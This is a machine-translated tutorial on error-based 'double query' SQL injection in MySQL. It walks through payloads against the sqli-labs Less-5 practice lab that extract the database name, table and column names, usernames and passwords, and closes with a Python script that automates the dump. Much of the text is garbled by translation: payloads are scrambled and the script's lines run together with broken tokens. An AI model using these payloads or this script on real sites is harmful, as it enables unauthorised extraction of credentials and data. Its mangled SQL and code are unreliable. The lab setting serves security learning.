Shulou(Shulou.com)05/31 Report--

This article mainly shows you "what is double query injection in SQL injection", the content is simple and clear, and I hope it can help you solve your doubts. Let me lead you to study and learn this article "what is double query injection in SQL injection".

What is double query injection?

Look at the boss's explanation is too esoteric, vulgar understanding is a select statement and then nested a select statement, the useful information will be displayed in the SQL error message.

First, understand four functions / statements: Concat (), Rand (), Floor (), Count (), Group by clause

① concat () function

I understand it as a combination, and the confluence function connects the symbols in parentheses.

Tie the results together. ② Rand function

It is used to return a random number between 01, and the interval is represented by [0primel 1). When the parenthesis is empty, the number is randomly generated.

When the parameters in parentheses are fixed, the random number (random sequence) is also fixed.

Let's take a look at the random sequence.

Select rand (3) from information_schema.columns limit 3

Generate three columns of random numbers.

The comparison remains the same.

③ Floor () function

The Floor () function takes the entire function, and when you enter a non-integer, it returns the largest integer less than or equal to the input parameter.

④ count () function

Used to count rows.

⑤ group by statement

Take a look at this sentence first:

Select table_schema, table_name from information_schema.tables

After adding the group by statement:

Select table_schema, table_name from information_schema.tables by table_schema

After that, the data is obviously much less repetitive. Only one duplicate database is displayed, and only the first table in the database is displayed.

If several functions are used flexibly, what unexpected results will there be?

Let's practice it.

The ① rand () function is used in conjunction with the floor () function.

Select floor (rand (5) * 12) from information_schema.columns limit 5

Analyzing one by one from the inside to the outside, rand (5) randomly produces five different values, but * 12, that is, expands [0jue 1) to [0Jing 12), and the floor function is rounded.

② count () function and group by statement

Select table_schema, count (*) from information_schema.tables group by table_schema

Their combination is to count how many tables there are in each database.

The principle is that Mysql creates a temporary table with two fields, group_key and tally, in which group_key sets the UNIQUE constraint, that is, two rows of group_key columns cannot have the same value. When using the group by statement and the count () function, the mysql database will first create a virtual table. When querying that the new key is not in the virtual table, the database will insert it into the table. If the key already exists in the database, find the count field corresponding to the key and add 1.

Core statement of ③ double query (combined use of several functions)

First look at payload:select floor (rand (14) * 2) c, count (*) from information_schema.columns group by c

If you reported it wrong, why did you report it wrong? Analyze: column c is grouped in the SQL statement, and column c is an alias for floor (rand (14) 2). Floor (rand (14) 2) produces a random sequence of numbers. The first four digits are: 1.

When we query, the mysql database will first create a temporary table with the group_key and tally fields of the UNIQUE constraint set. When querying that the new "group_ key" is not in the temporary table, the database inserts it into the temporary table. If the group_key key already exists in the database, find the tally count field corresponding to the key and add 1.

After creating the temporary table, Mysql starts to scan the information_schema.columns table line by line, and the first grouping column encountered is floor (rand (14) 2). After calculating its value of 1, it goes to query whether there is a row with group_key 1 in the temporary table, and finds that there is no row in the temporary table. The group_key is floor (rand (14) 2). Note that it is calculated again at this time, and the result is 0. So the row actually inserted into the temporary table is 0 group_key and 1, and the temporary table becomes:

Mysql continues to scan the information_schema.columns table, encounters the second grouping column or floor (rand (14) 2), calculates that its value is 1 (this 1 is the third number in the random sequence), then queries whether there is a row with group_key 1 in the temporary table, and finds no, so adds a new row in the temporary table, group_key is floor (rand (14) 2), and calculates again, and the result is 0 (this 0 is the fourth number in the random sequence). So try to insert a row of data into the temporary table with a group_key of 0 and a value of 1. But in fact, there is already a row in the temporary table with a group_key of 0, and group_key sets a non-repeatable constraint, so an error occurs.

Now that we know the principle, let's do some actual combat. Take sql-lib/Less-5 as an example:

Judge the point of closure:

Then query the database: build payload:?id=-1' union select 1 account (*), concat ((select database ()), floor (rand () * 2)) as a from information_schema.tables group by a-- +

The database is displayed in the error message.

However, because it is a random value, there is only a 50% chance of reporting an error.

The same payload appears to be normal.

Some bosses say that rand () can report 100% errors by modifying the seeds used by it, as follows: change rand () to rand (1), and test 100% errors, that is, payload:?id=-1' union select 1 as a from information_schema.tables group by a count (*), concat ((select database ()), floor (rand (1) * 2))

But I found that rand (1) will not report wrong 100%, on the contrary, I have tried several times but did not report wrong. Only 4, 11, 14, 15, these numbers will report wrong 100%, I do not know why, leave a suspense here, I hope the boss can explain it.

Let's burst the table. Before we know that the current database is security, we construct payload:?id=-1' union select 1 as a from information_schema.columns group by a count (*), concat (select table_name from information_schema.tables where table_schema='security' limit 3) 1), floor (rand (4) * 2))-- +

With a total of four tables, we got what we wanted in the third one.

Know the table name, look at the column value, construct payload:?id=-1' union select 1 select column_name from information_schema.columns where table_name='users' limit count (*), concat ((select column_name from information_schema.columns where table_name='users' limit 4) 1), floor (rand (4) * 2)) as a from information_schema.columns group by a-- +

By changing the value of X in limit Xp1, I saw the password field in 3Pol 1.

I got the user name field at 9 # 1.

Start to take the user name and password to construct payload:?id=-1' union select 1 select username from users limit count (*), concat ((select username from users limit 0Jing 1), floor (rand (4) * 2)) as a from information_schema.columns group by a-- +

And? id=-1' union select 1 as a from information_schema.columns group by a count (*), concat (select password from users limit 0) 1), floor (rand (4) * 2) as a from information_schema.columns group by a-- +

It should be noted here that the number of columns of the user name and password should be changed relative.

Is jio in trouble? attach the python code of the Mochaaz boss.

Import requestsfrom bs4 import BeautifulSoupdb_name =''table_list = [] column_list = [] url =' http://192.168.1.158/sqlilabs/Less-5/?id=1'''### gets the current database name # print ('current database name:') payload = 'and 1 = (select count (*) from information_schema.columns group by concat (0x3a, (select database ()), 0x3a) Floor (rand (0) * 2))-- +''r = requests.get (url+payload) db_name = r.text.split (':') [- 2] print ('[+]'+ db_name) # get the table name # print (table name under 'database% s:'% db_name) for i in range (50): payload = 'and 1 = (select count (*) from information_schema.columns group by concat (0x3a) (select table_name from information_schema.tables where table_schema='%s' limit% dline 1), 0x3a rand (0) * 2))-- +''% (db_name) I) r = requests.get (url+payload) if 'group_key' not in r.text:breaktable_name = r.text.split (':') [- 2] table_list.append (table_name) print ('[+]'+ table_name) # get the column name # here take the users table as an example # print (column name under'% s table:'% table_list [- 1]) for i in range (50) : payload = 'and 1 = (select count (*) from information_schema.columns group by concat (0x3a) (select column_name from information_schema.columns where table_name='%s' limit% dline 1), 0x3a rand (0) * 2))-- +''% (table_list [- 1]) I) r = requests.get (url + payload) if 'group_key' not in r.text:breakcolumn_name = r.text.split (':') [- 2] column_list.append (column_name) print ('[+]'+ column_name) # get the field value # here take username as an example # print (field value under'% s column:'% column_list [- 2]) for i in Range (50): payload =''and 1 = (select count (*) from information_schema.columns group by concat (0x3a) (select% s from% s limit% djinger 1), 0x3a recording (rand (0) * 2))-+''% (column_list [- 2], db_name,table_list [- 1], I) r = requests.get (url + payload) if 'group_key' not in r.text:breakdump = r.text.split (':') [- 2] print ('[+]'+ dump)

After a few hours of injection, the code came out in a few seconds.

These are all the contents of the article "what is double query injection in SQL injection". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.